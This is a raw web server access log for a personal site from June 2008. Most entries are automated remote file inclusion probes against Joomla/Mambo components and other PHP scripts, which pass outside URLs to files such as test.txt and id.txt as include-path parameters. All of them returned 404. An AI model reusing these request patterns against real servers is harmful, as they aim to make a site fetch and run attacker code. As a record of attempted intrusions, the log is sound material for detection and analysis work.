206.221.179.200 - - [09/Jun/2008:11:23:44 -0700] "GET /logs/poll/comments.php?id=http://supervisa.com.mx/up.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
209.126.254.80 - - [09/Jun/2008:11:24:29 -0700] "GET //errors.php?error=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.notahamsandwich.com"
209.126.254.80 - - [09/Jun/2008:11:24:29 -0700] "GET /logs//errors.php?error=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.notahamsandwich.com"
74.6.18.233 - - [09/Jun/2008:11:33:33 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
207.58.164.77 - - [09/Jun/2008:11:34:36 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
207.58.164.77 - - [09/Jun/2008:11:34:36 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
207.58.164.77 - - [09/Jun/2008:11:34:36 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
207.58.164.77 - - [09/Jun/2008:11:38:53 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
207.58.164.77 - - [09/Jun/2008:11:38:53 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
193.224.55.172 - - [09/Jun/2008:11:47:25 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
193.224.55.172 - - [09/Jun/2008:11:47:25 -0700] "GET /errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
193.224.55.172 - - [09/Jun/2008:11:47:25 -0700] "GET /logs/errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
193.224.55.172 - - [09/Jun/2008:11:47:27 -0700] "GET /logs/access.log/errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:07:51 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:07:51 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:07:55 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:07:55 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:08:39 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://powderpuffsquad.com//images/press/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:08:39 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://powderpuffsquad.com//images/press/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:14:10 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:14:10 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:14:10 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:14:11 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:14:52 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
72.47.201.117 - - [09/Jun/2008:12:14:53 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
83.223.116.60 - - [09/Jun/2008:12:15:48 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://perevorot.org/cache/tits.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
83.223.116.60 - - [09/Jun/2008:12:15:48 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://perevorot.org/cache/tits.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:17:45 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:17:45 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:17:45 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
91.121.87.84 - - [09/Jun/2008:12:18:10 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
72.14.199.72 - - [09/Jun/2008:12:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
83.223.116.60 - - [09/Jun/2008:12:18:57 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://perevorot.org/cache/tits.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
201.6.123.99 - - [09/Jun/2008:12:21:20 -0700] "GET /logs/access_080519.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.notahamsandwich.com"
201.6.123.99 - - [09/Jun/2008:12:21:21 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.notahamsandwich.com"
201.6.123.99 - - [09/Jun/2008:12:21:21 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:24:15 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
201.6.123.99 - - [09/Jun/2008:12:24:24 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.notahamsandwich.com"
201.6.150.185 - - [09/Jun/2008:12:24:47 -0700] "GET /logs/access_080519.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.150.185 - - [09/Jun/2008:12:24:49 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.150.185 - - [09/Jun/2008:12:24:50 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:26:42 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:26:42 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:26:42 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:12:26:53 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
201.6.150.185 - - [09/Jun/2008:12:29:07 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
77.91.224.15 - - [09/Jun/2008:12:29:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.notahamsandwich.com"
77.91.224.15 - - [09/Jun/2008:12:29:30 -0700] "GET / HTTP/1.1" 200 912 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:29:37 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:29:37 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:29:37 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
80.67.23.197 - - [09/Jun/2008:12:30:02 -0700] "GET /logs/main.php?link=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
80.67.23.197 - - [09/Jun/2008:12:30:02 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
80.67.23.197 - - [09/Jun/2008:12:30:02 -0700] "GET /main.php?link=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
80.67.23.197 - - [09/Jun/2008:12:30:02 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:12:30:15 -0700] "GET /logs/access_080519.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:12:30:16 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:12:30:16 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:31:43 -0700] "GET /logs/access_080519.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:31:43 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:31:43 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:12:33:03 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:12:34:27 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:12:34:36 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
72.29.73.71 - - [09/Jun/2008:12:39:15 -0700] "GET /logs/access_080519.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.73.71 - - [09/Jun/2008:12:39:15 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.73.71 - - [09/Jun/2008:12:39:15 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
208.71.170.173 - - [09/Jun/2008:12:39:35 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
208.71.170.173 - - [09/Jun/2008:12:39:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
208.71.170.173 - - [09/Jun/2008:12:39:36 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
72.29.73.71 - - [09/Jun/2008:12:40:51 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:41:29 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
66.230.197.245 - - [09/Jun/2008:12:41:29 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
74.52.238.34 - - [09/Jun/2008:12:41:45 -0700] "GET /logs/access_080519.log/errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
74.52.238.34 - - [09/Jun/2008:12:41:46 -0700] "GET /errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
74.52.238.34 - - [09/Jun/2008:12:41:46 -0700] "GET /logs/errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
74.52.238.34 - - [09/Jun/2008:12:42:53 -0700] "GET /logs/access.log/errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
201.6.123.99 - - [09/Jun/2008:12:45:13 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.notahamsandwich.com"
201.6.123.99 - - [09/Jun/2008:12:45:13 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:12:47:30 -0700] "GET //macgurublog_menu/comment.php?rid=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:12:47:30 -0700] "GET /logs//macgurublog_menu/comment.php?rid=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.notahamsandwich.com"
201.6.150.185 - - [09/Jun/2008:12:55:06 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.150.185 - - [09/Jun/2008:12:55:06 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:12:59:27 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:12:59:31 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
91.121.87.84 - - [09/Jun/2008:13:06:18 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
91.121.87.84 - - [09/Jun/2008:13:06:18 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
64.202.117.159 - - [09/Jun/2008:13:08:59 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
64.202.117.159 - - [09/Jun/2008:13:08:59 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
64.202.117.159 - - [09/Jun/2008:13:08:59 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:13:11:00 -0700] "GET /logs/access_080519.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:13:11:03 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:13:11:04 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:13:11:39 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
203.72.181.15 - - [09/Jun/2008:13:11:39 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:13:15:58 -0700] "GET /logs/access_080519.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:13:15:58 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
201.6.121.78 - - [09/Jun/2008:13:16:24 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:13:17:20 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
195.54.9.218 - - [09/Jun/2008:13:17:45 -0700] "GET /logs/access.log//addpost_newpoll.php?addpoll=preview&thispath=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
195.54.9.218 - - [09/Jun/2008:13:17:45 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
195.54.9.218 - - [09/Jun/2008:13:17:46 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
72.14.199.100 - - [09/Jun/2008:13:19:59 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
195.54.9.218 - - [09/Jun/2008:13:21:03 -0700] "GET /logs/access_080519.log//addpost_newpoll.php?addpoll=preview&thispath=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
202.221.143.111 - - [09/Jun/2008:13:35:27 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
